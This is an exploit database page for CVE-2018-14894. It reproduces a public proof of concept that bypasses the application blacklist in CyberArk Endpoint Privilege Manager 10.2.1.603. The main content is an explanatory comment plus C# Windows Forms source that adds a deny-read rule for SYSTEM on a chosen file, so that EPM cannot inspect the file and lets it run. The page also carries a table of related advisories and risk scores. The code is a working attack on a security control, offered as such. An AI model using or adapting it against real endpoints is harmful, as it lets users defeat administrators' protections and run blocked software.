Vulners
Lucene search
CyberArk EPM 10.2.1.603 - Security Restrictions Bypass
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CyberArk EPM 10.2.1.603 - Security Restrictions #Bypass Exploit | 12 Apr 201900:00 | – | zdt |
 | CyberArk Software CyberArk Endpoint Privilege Manager Access Bypass Vulnerability | 10 Apr 201900:00 | – | cnvd |
 | CVE-2018-14894 | 9 Apr 201917:27 | – | cve |
 | CVE-2018-14894 | 9 Apr 201917:27 | – | cvelist |
 | EUVD-2018-6776 | 7 Oct 202500:30 | – | euvd |
 | CyberArk EPM 10.2.1.603 - Security Restrictions Bypass | 12 Apr 201900:00 | – | exploitpack |
 | CVE-2018-14894 | 9 Apr 201918:29 | – | nvd |
 | CVE-2018-14894 | 9 Apr 201918:29 | – | osv |
 | CyberArk EPM 10.2.1.603 Security Restrictions Bypass | 12 Apr 201900:00 | – | packetstorm |
 | Design/Logic Flaw | 9 Apr 201918:29 | – | prion |
10
# Exploit Title: CyberArk Endpoint bypass
# Google Dork: -
# Date: 03/06/2018
# Exploit Author: Alpcan Onaran, Mustafa Kemal Can
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894
//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
//This product also has a function called “Application Blacklist”. You probably know what that means.
//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute
This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;
namespace raceagainstthesystem
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void btn_change_access_control_Click(object sender, EventArgs e)
{
string fileName = txt_filepath.Text;
FileSecurity fSecurity = File.GetAccessControl(fileName);
fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
FileSystemRights.ReadData, AccessControlType.Deny));
File.SetAccessControl(fileName, fSecurity);
/*
fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
FileSystemRights.ReadData, AccessControlType.Allow));
*/
File.SetAccessControl(fileName, fSecurity);
}
private void btn_choseFile_Click(object sender, System.EventArgs e)
{
OpenFileDialog choofdlog = new OpenFileDialog();
choofdlog.Filter = "All Files (*.*)|*.*";
choofdlog.FilterIndex = 1;
choofdlog.Multiselect = true;
string sFileName = "";
if (choofdlog.ShowDialog() == DialogResult.OK)
{
sFileName = choofdlog.FileName;
string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true
}
txt_filepath.Text = sFileName;
}
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2019 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 24.6
CVSS 37.8
EPSS0.00168